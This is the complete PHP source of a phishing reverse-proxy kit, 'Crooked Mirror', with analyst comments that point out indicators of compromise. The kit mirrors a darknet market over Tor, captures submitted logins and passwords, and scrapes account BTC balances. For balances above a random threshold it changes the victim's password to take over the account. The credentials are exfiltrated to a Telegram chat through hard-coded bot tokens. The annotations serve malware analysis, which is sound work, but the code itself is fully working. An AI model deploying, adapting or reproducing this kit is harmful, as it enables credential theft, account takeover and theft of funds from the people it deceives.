1<?php
2//Crooked Mirror v0.2
3
4include('rewrite.php');
5
// Analysis note: crawler / link-preview detection by User-Agent substring.
// $ua - User-Agent string to test; when empty, the request's HTTP_USER_AGENT is used if it is set.
// Returns true when $ua contains any entry of the hard-coded list (case-sensitive strpos), false otherwise.
// In this file the result is consulted only where the <title> of a proxied page is rewritten,
// so crawlers can be served different markup than ordinary visitors (cloaking indicator).
6function bot($ua="") {
7 if(empty($ua) && isset($_SERVER['HTTP_USER_AGENT'])) $ua=$_SERVER['HTTP_USER_AGENT'];
8 $list = array("facebookexternalhit","Teoma", "alexa", "froogle", "Gigabot", "inktomi",
9 "looksmart", "URL_Spider_SQL", "Firefly", "NationalDirectory",
10 "Ask Jeeves", "TECNOSEEK", "InfoSeek", "WebFindBot", "girafabot",
11 "crawler", "www.galaxy.com", "Googlebot", "Scooter", "Slurp",
12 "msnbot", "appie", "FAST", "WebBug", "Spade", "ZyBorg", "rabaz",
13 "Baiduspider", "Feedfetcher-Google", "TechnoratiSnoop", "Rankivabot",
14 "Mediapartners-Google", "Sogou web spider", "WebAlta Crawler","TweetmemeBot",
15 "Butterfly","Twitturls","Me.dium","Twiceler");
16 foreach($list as $bot){
17 if(strpos($ua,$bot)!==false) return true;
18 }
19 return false;
20}
21
// Analysis note: request intake for a reverse-proxy ("mirror") of a third-party site.
// $self is this host's own base URL and is always built with the http:// scheme.
22$self = 'http://'.$_SERVER['SERVER_NAME'].'/';
// The upstream base URL is not in the code: it is read from sitetarget.txt in the document root
// (host artefact worth collecting; the script stops with 'No target' when it is missing or empty).
23$uri = file_get_contents($_SERVER['DOCUMENT_ROOT'].'/sitetarget.txt');
24if(!$uri) exit('No target');
25
26//Incoming request data
27$uripath = $_SERVER['REQUEST_URI'];
28
29
30$isPost = $_SERVER['REQUEST_METHOD'] === 'POST';
31
// Split the request URI into path ($adress) and query string ($data) at the first '?'.
32$adress = $uripath;
33$data = '';
34if( is_numeric(strpos($uripath,'?')) ) {
35 $urlarr = explode('?',$uripath);
36
37 $adress = array_shift($urlarr);
38 $data = array_shift($urlarr);
39}
40
// Requests whose path contains this script's own file name are refused with 'No.'.
41if(is_numeric( strpos($adress,basename(__FILE__)) )) exit('No.');
42
43if(strlen($data)>1) $data = '?'.$data;
44
// Drop a single trailing '/' from the path, then rebuild path + query for the upstream request.
45if(substr($adress,strlen($adress)-1,strlen($adress))=='/') $adress = substr($adress,0,strlen($adress)-1);
46$uripath = $adress.$data;
47
48
// All request headers sent by the visitor are captured here and later handed to cURL unchanged.
49$outheads = getallheaders();
50
51
52
// Every POST field is copied so the same form body can be replayed upstream.
// The two commented-out lines show that the 'login' and 'password' fields were once logged at this point.
53$clPost = array();
54foreach($_POST as $key => $data) {
55 //if($key=='login') logger($data.' - ');
56 //if($key=='password') logger($data."\n\n");
57 $clPost[$key] = $data;
58}
59
// Analysis note: the visitor-facing PHP session cookie is named 'webcook' (observable in traffic to the mirror).
60session_name('webcook');
61session_start();
62
63
64if( ($myCurl = curl_init()) != true) {die("No cure init");}
65
66
// The visitor's own headers and User-Agent are forwarded, so upstream sees the visitor's browser fingerprint.
67curl_setopt($myCurl, CURLOPT_HTTPHEADER, $outheads);
68curl_setopt($myCurl, CURLOPT_USERAGENT, $outheads['User-Agent'] );
69curl_setopt($myCurl, CURLOPT_FOLLOWLOCATION, 1);
70curl_setopt($myCurl, CURLOPT_MAXREDIRS, 10);
71curl_setopt($myCurl, CURLOPT_TIMEOUT, 30);
72curl_setopt($myCurl, CURLOPT_ENCODING, 'gzip,deflate');
// Certificate and host-name verification are both switched off for the upstream connection.
73curl_setopt($myCurl, CURLOPT_SSL_VERIFYPEER, 0);
74curl_setopt($myCurl, CURLOPT_SSL_VERIFYHOST, 0);
75curl_setopt($myCurl, CURLOPT_RETURNTRANSFER, true);
// Proxy type 7 is libcurl's CURLPROXY_SOCKS5_HOSTNAME (name resolution done by the proxy).
// 127.0.0.1:9050 is the default Tor SOCKS listener, so the upstream is presumably reached over Tor;
// the actual target is only in sitetarget.txt. A web server process talking to a local SOCKS port is a host-level indicator.
76curl_setopt($myCurl, CURLOPT_PROXYTYPE, 7);
77curl_setopt($myCurl, CURLOPT_PROXY, "127.0.0.1:9050");
78
79$reload = false;
80
// One upstream cookie jar per visitor session: tmpcookies/<session id>.txt next to this script,
// seeded from tmpcookies/maincook.txt when that file exists. These jars hold the upstream session
// cookies obtained on behalf of each visitor.
81if( strlen( session_id() ) > 0 ) {
82$cookiefile = dirname(__FILE__) . '/tmpcookies/' . session_id().'.txt';
83
84if(!file_exists($cookiefile) && file_exists(dirname(__FILE__) . '/tmpcookies/maincook.txt')) copy(dirname(__FILE__) . '/tmpcookies/maincook.txt',$cookiefile);
85
86curl_setopt($myCurl, CURLOPT_COOKIEFILE, $cookiefile );
87curl_setopt($myCurl, CURLOPT_COOKIEJAR, $cookiefile);
// Without a session id no jar is used and the visitor is redirected to $self after the fetch (see $reload below).
88} else {$reload = true;}
89curl_setopt($myCurl, CURLOPT_URL, $uri.$uripath);
90
// POST requests are replayed upstream with the copied form fields, credentials included.
91if($isPost) {
92 curl_setopt($myCurl, CURLOPT_POST, $isPost);
93 curl_setopt($myCurl, CURLOPT_POSTFIELDS, http_build_query($clPost));
94}
95$response = curl_exec($myCurl);
96
// Analysis note: post-processing of the upstream page before it is served to the visitor.
// When the page contains the captcha prompt "Вы не робот?" ("Are you not a robot?") and the
// User-Agent matches bot(), the <title> is replaced with a fixed brand title - presumably so that
// crawlers index the brand title instead of the captcha page title.
97if(strpos($response,"Вы не робот?") && bot()) {
98 $response = preg_replace('/<title>(.*?)<\/title>/', '<title>Hydra - моментальные магазины</title>', trim($response));
99}
100
101
// No session id was available above: send the visitor back to the mirror's root with a 301.
102if($reload) {
103 header("HTTP/1.1 301 Moved Permanently",true,301);
104 header("Location: $self");
105 exit();
106}
107
// Compare the URL cURL ended up on (after upstream redirects) with the requested path,
// both reduced to a path without the upstream base and without leading slashes.
108$effurl = curl_getinfo($myCurl, CURLINFO_EFFECTIVE_URL);
109$effurl = substr($effurl,strlen($uri),strlen($effurl));
110while($uripath[0]=='/' || $effurl[0]=='/') {
111 if($uripath[0]=='/') $uripath = substr($uripath,1,strlen($uripath));
112 if($effurl[0]=='/') $effurl = substr($effurl,1,strlen($effurl));
113}
114//if(!$_SESSION['ReTime']) $_SESSION['ReTime']=0;
115//if(!$_SESSION['ReCount']) $_SESSION['ReCount']=0;
// Per-session counter of requests that arrive within the same second as the previous one;
// after more than five in a row the script stops with an 'error ...' line - looks like a
// redirect-loop guard (inferred from the values printed).
116if($_SESSION['ReTime']>(time()-1)) {$_SESSION['ReCount']++;}else{$_SESSION['ReCount']=0;}
117$_SESSION['ReTime'] = time();
118if($_SESSION['ReCount']>5) exit( 'error '.$effurl.' == '.$uripath.' - '.($effurl==$uripath) );
119
// If upstream redirected, the visitor is pointed at the same path on the mirror, never at upstream.
120header("HTTP/1.1 200 OK",true,200);
121if($effurl!=$uripath) header("Location: $self$effurl");
122header('Content-Type: text/html; charset=utf8');
123
// Empty upstream response: show "High load on the site, try refreshing the page."
124if(strlen($response)<1) exit("Высокая нагрузка на сайт, попробуйте обновить страницу.");
125
// Every occurrence of the upstream base URL in the body is replaced with the mirror's own URL,
// so links and forms keep the visitor on the mirror.
126$response = str_replace( $uri , $self , $response );
127
128$response = change_post_link($response);
129
// Every literal "https" in the body becomes "http": the served copy never links to TLS URLs.
130$needle = 'https';
131$replace = 'http';
132$response = str_replace( $needle , $replace , $response );
133
// rewrite() comes from the included rewrite.php, which is not shown here.
134$response = rewrite($response,$uripath);
135
// Unless this run was started from one of the generated stub files (they define INCLUDE_CHECK),
// fillingin() writes stub/cached files to disk for the requested path.
136if(!defined('INCLUDE_CHECK')) {
137
138 if( is_numeric(strpos($uripath,'?')) ) $uripath = array_shift(explode('?',$uripath));
139
140 $buildarr = explode('/',$adress);
141 fillingin($buildarr,$response);
142}
143
// Analysis note: credential interception and account takeover.
// Runs on any request that posts non-empty 'login' and 'password' fields. By this point the same
// fields have already been replayed upstream, so $response is the upstream reply to that login.
144if($_POST['login'] != "" && $_POST['password'] != "")
145{
// Scrape the account balance from the returned page: $bal[1] is the amount in the link title
// ("На вашем счете ..." = "On your account ..."), $bal[2] the BTC amount.
146 $response = str_replace("\n","",$response);
147 preg_match('/<a href="\/balance" title="На вашем счете (.*?)"><i class="i_wallet"><\/i><span>(.*?) BTC<\/span><\/a>/', $response, $bal);
148
// A threshold is picked at random from the lines of amount_d.txt in the document root.
149 $arrboot = explode("\n",file_get_contents($_SERVER['DOCUMENT_ROOT'].'/amount_d.txt'));
150 $amount = $arrboot[rand(0,count($arrboot)-1)];
151 $pass = $_POST['password'];
152
// Balance above the threshold: the victim's password is replaced with a generated one.
153 if((float)$bal[2] > (float)$amount) {
154 $pass = random_pass();
// First value="..." attribute in the page - presumably the form's anti-CSRF token, since it is sent as _token below.
155 preg_match('/value="(.*?)">/', $response, $found);
156
// Login, new password, balance and old password ("Данные" = data, "Баланс" = balance,
// "Старый пароль" = old password) are appended to a text file in the document root.
// NOTE(review): the first character of this file name may be a Cyrillic letter rather than a Latin 'c' -
// compare bytes, not glyphs, when searching a host for it.
157 $fsd = fopen($_SERVER['DOCUMENT_ROOT'].'/сh_pass555777.txt',"a");
158 $str = "Данные - " . $_POST['login'] . ":" . $pass . PHP_EOL . "Баланс - " . trim($bal[2]) . " / " . $bal[1] . PHP_EOL . "Старый пароль - " . $_POST['password'] . "\r\n";
159 fwrite($fsd, $str);
160 fclose($fsd);
161
// Body of the upstream account-settings form: sets the new password, supplies the captured one as
// old_password, and submits an empty gpg_key setting.
162 $data = [
163 "_token" => $found[1],
164 "_time" => time(),
165 "avatar" => "",
166 "password" => $pass,
167 "password_confirmation" => $pass,
168 "old_password" => $_POST['password'],
169 "settings[theme]" => "hydra",
170 "settings[notify]" => "default",
171 "settings[gpg_key]" => ""
172 ];
173
// Second upstream request, configured like the first one: visitor headers, TLS checks off,
// SOCKS proxy on 127.0.0.1:9050, and the same per-session cookie jar (i.e. the victim's logged-in upstream session).
174 if( ($myCurl = curl_init()) != true) {die("No cure init");}
175
176 curl_setopt($myCurl, CURLOPT_HTTPHEADER, $outheads);
177 curl_setopt($myCurl, CURLOPT_USERAGENT, $outheads['User-Agent'] );
178 curl_setopt($myCurl, CURLOPT_FOLLOWLOCATION, 1);
179 curl_setopt($myCurl, CURLOPT_MAXREDIRS, 10);
180 curl_setopt($myCurl, CURLOPT_TIMEOUT, 30);
181 curl_setopt($myCurl, CURLOPT_ENCODING, 'gzip,deflate');
182 curl_setopt($myCurl, CURLOPT_SSL_VERIFYPEER, 0);
183 curl_setopt($myCurl, CURLOPT_SSL_VERIFYHOST, 0);
184 curl_setopt($myCurl, CURLOPT_RETURNTRANSFER, true);
185 curl_setopt($myCurl, CURLOPT_PROXYTYPE, 7);
186 curl_setopt($myCurl, CURLOPT_PROXY, "127.0.0.1:9050");
187
188 $reload = false;
189
190 if( strlen( session_id() ) > 0 ) {
191 $cookiefile = dirname(__FILE__) . '/tmpcookies/' . session_id().'.txt';
192
193 if(!file_exists($cookiefile) && file_exists(dirname(__FILE__) . '/tmpcookies/maincook.txt')) copy(dirname(__FILE__) . '/tmpcookies/maincook.txt',$cookiefile);
194
195 curl_setopt($myCurl, CURLOPT_COOKIEFILE, $cookiefile );
196 curl_setopt($myCurl, CURLOPT_COOKIEJAR, $cookiefile);
197 } else {$reload = true;}
// The settings form is posted to the victim's own account page upstream.
198 curl_setopt($myCurl, CURLOPT_URL, $uri."/user/{$_POST['login']}/account");
199
200 curl_setopt($myCurl, CURLOPT_POST, true);
201 curl_setopt($myCurl, CURLOPT_POSTFIELDS, http_build_query($data));
202
// $response now holds the reply to the password change; that reply is what the visitor is finally served.
203 $response = curl_exec($myCurl);
204
// The visitor's session id on the mirror is rotated, and the takeover is reported through
// logger() with type 1 ("Новый пароль" = new password).
205 session_regenerate_id();
206 logger("==============================" . PHP_EOL . "Time:" .date("H:i:s d.m.Y") . PHP_EOL . "Account: {$_POST['login']}" . PHP_EOL . "Balance: " . trim($bal[2]) . " | " . $bal[1] . PHP_EOL . "Старый пароль: {$_POST['password']}" . PHP_EOL . "Новый пароль: {$pass}" . PHP_EOL . "==============================",1);
207 } else {
// Balance at or below the threshold: the password is left alone, but login, password and balance are still logged (type 0).
208 logger("Данные - " . $_POST['login'] . ":" . $pass . PHP_EOL . "Баланс - " . trim($bal[2]) . " | " . $bal[1] . PHP_EOL);
209 }
210
211
212}
// Normalise one specific search-form action ("//catalog" becomes "/catalog"), then emit the page and stop.
213$response = str_replace('<form method="GET" action="//catalog" accept-charset="UTF-8" id="catalog-filters" class="searchform">', '<form method="GET" action="/catalog" accept-charset="UTF-8" id="catalog-filters" class="searchform">', $response);
214
215// fclose($fd);
216exit($response);
217
// Analysis note: exfiltration helper. Appends $msg to logs555777.txt in the document root and then
// sends the same text to a Telegram chat through the Bot API (tg_send_message, defined further down).
// $msg  - text to record.
// $type - 0 selects the first hard-coded bot token, any other value the second one;
//         both send to the same hard-coded chat id.
// Returns an error string when the log file cannot be opened or written (nothing is sent in that case);
// returns nothing on success.
// The chat id, the two bot tokens and the log file name are hard-coded, which makes them usable as
// indicators when matching samples or reviewing a host.
218function logger($msg,$type = 0) {
219 //$msg.='\n\n';
220 if(!$handle = fopen($_SERVER['DOCUMENT_ROOT'].'/logs555777.txt',"a")) return "File does open";
221 if(fwrite($handle,$msg,strlen($msg))===false) return "cant write";
222 fclose($handle);
223 if($type == 0) {
224 // general log
225 tg_send_message(623177568, $msg, "660436227:AAGmYojjXS4ok_HB-ua8yOz3fUZyztT7UPU");
226 } else {
227 // log for accounts whose password was changed
228 tg_send_message(623177568, $msg, "642550955:AAE2FbkhavRJnVJWm0v7vihiEYEPJaGJ7ZA");
229 }
230
231
232
233}
234
// Analysis note: builds the replacement password used in the takeover branch above.
// $length - number of characters to generate (default 12).
// Returns a string of $length characters drawn from a-z, A-Z and 0-9.
// The generator is rand(), re-seeded on every call from the sub-second part of microtime().
235function random_pass($length = 12) {
236 $use = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
237
238 $api = '';
239 srand((double)microtime()*1000000);
240 for($i=0; $i<$length; $i++) {
241 $api.= $use[rand()%strlen($use)];
242 }
243 return $api;
244}
245
// Analysis note: rewrites the action URL of POST forms in the proxied HTML.
// $response - HTML to modify.
// $offset   - position from which to look for the next method="post" (used by the recursion).
// Returns the HTML with a '/' appended to the action value of the POST forms it processed.
// Presumably this makes form posts land on the directory-style URLs that fillingin() creates
// on the mirror - inferred, not stated in the code.
246function change_post_link($response,$offset = 0)
247{
// Searching is done on a lower-cased copy so the match is case-insensitive; edits go to the original.
248 $Lresponse = strtolower($response);
249
250 $needle = 'method="post"';
251 $coorstar = strpos($Lresponse,$needle,$offset);
252 if(!is_numeric($coorstar)) return $response;
253
// Next search resumes just after this method="post" occurrence.
254 $offset = $coorstar+strlen($needle);
255
// Walk backwards to the '<' that opens the tag containing method="post".
256 while($Lresponse[$coorstar]!='<' || $coorstar<1) $coorstar--;
257 if($coorstar<1) return change_post_link($response,$offset);
258
// Locate the action="..." value that follows the tag start.
259 $needle = 'action="';
260 $coorstar = strpos($Lresponse,$needle,$coorstar);
261 if(!is_numeric($coorstar)) return change_post_link($response,$offset);
262
263 $coorstar += strlen($needle);
264 $coorend = strpos($Lresponse,'"',$coorstar);
265 if(!is_numeric($coorend)) return change_post_link($response,$offset);
// An action that already ends in '/' ends processing for the whole document, not just this form.
266 if($response[$coorend-1]=='/') return $response;
267
// Insert '/' immediately before the closing quote of the action value, then continue with the next form.
268 $response = substr($response,0,$coorend).'/'.substr($response,$coorend,strlen($response));
269 return change_post_link($response,$offset);
270}
271
// Analysis note: writes files to disk so that requested paths exist as real files/directories on the mirror.
// $buildarr - request path split on '/' (the caller passes explode('/',$adress), i.e. visitor-supplied path segments).
// $response - page body for the request; defaults to the string 'NULL' on recursive calls.
// Behaviour visible in the code:
//   - last segment contains a '.': the response body is written to a file of that name
//     (a cached copy of the upstream file);
//   - otherwise: an index.php stub is written that defines INCLUDE_CHECK and requires
//     crookedmirror.php through a relative ../ path - presumably this script's own file name;
//   - directories are created recursively with mode 0777;
//   - the function then recurses so that parent directories get stubs too, and stops once the target file already exists.
// Paths are relative, so files land under the process working directory. On an affected host,
// index.php files containing define('INCLUDE_CHECK',true) and a require of crookedmirror.php are artefacts of this routine.
// Returns "already done", "File does open" or "cant write" on those paths, otherwise nothing.
272function fillingin($buildarr,$response = 'NULL') {
273
274if(strpos($buildarr[count($buildarr)-1],'.') === false) {$filename = ''; } else {$filename = array_pop($buildarr);}
275
// $format is numeric only when a file name with a dot was taken from the path.
276$format = strpos($filename,'.');
277
// Build one '../' per non-empty directory segment (for the stub's require path) and the matching directory path.
278$newaddres = '\'';
279$filepath = '';
280foreach($buildarr as $name) {
281 if($name=='') continue;
282 $newaddres = $newaddres.'../';
283 $filepath = $filepath.$name.'/';
284}
285$newaddres = '<?php define(\'INCLUDE_CHECK\',true); require '.$newaddres.'crookedmirror.php\';';
286
287
288if($filename=="") $filename='index.php';
289
290if(file_exists($filepath.$filename)) return "already done";
291
292if( !file_exists($filepath) ) mkdir($filepath, 0777, true);
// For a path that names a file, the upstream response replaces the stub text as the content to write.
293if(is_numeric($format)) $newaddres = $response;
294if($newaddres!='') {
295if(!$handle = fopen($filepath.$filename , "w")) return "File does open";
296if(fwrite($handle,$newaddres,strlen($newaddres))===false) return "cant write";
297fclose($handle);
298}
299
300//copy('.htaccess', $filepath.'.htaccess');
301
// Blank the last segment and repeat for the parent directory.
302$buildarr[count($buildarr)-1]="";
303
304if(count($buildarr)>0) fillingin($buildarr);
305}
306
// Analysis note: generic Telegram Bot API call used as the exfiltration channel.
// $n     - Bot API method name appended to the URL (the only caller in this file passes "sendMessage").
// $post  - POST fields for the call.
// $token - bot token; when empty, falls back to the global $settings['tgtoken'] ($settings is not defined in this file).
// Returns the JSON-decoded API reply.
// Certificate and host-name verification are disabled for this request as well.
// Outbound requests from a web server to api.telegram.org/bot... are a network-level indicator for this kit.
307 function apitgbot($n, $post, $token = "")
308 {
309 global $settings;
310 if($token == "") $token = $settings['tgtoken'];
311 $ch = curl_init();
312 curl_setopt($ch, CURLOPT_URL, "https://api.telegram.org/bot".$token."/".$n);
313 curl_setopt($ch, CURLOPT_HEADER, false);
314 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
315 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
316 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
317 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
318 curl_setopt($ch, CURLOPT_POST, true);
319 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
320 $data = json_decode(curl_exec($ch));
321 curl_close($ch);
322 return $data;
323 }
324
325
// Analysis note: sends one text message to a Telegram chat via apitgbot("sendMessage", ...).
// $to    - chat id that receives the message.
// $text  - message text; sent with parse_mode "HTML".
// $token - bot token passed through to apitgbot().
// Returns whatever apitgbot() returns (the decoded API reply).
// In this file the text is the captured login, password and balance assembled by logger()'s callers.
326 function tg_send_message($to, $text, $token = "")
327 {
328 $post['chat_id'] = $to;
329 $post['parse_mode'] = "HTML";
330 $post['disable_web_page_preview'] = false;
331 $post['text'] = $text;
332 return apitgbot("sendMessage", $post, $token);
333 }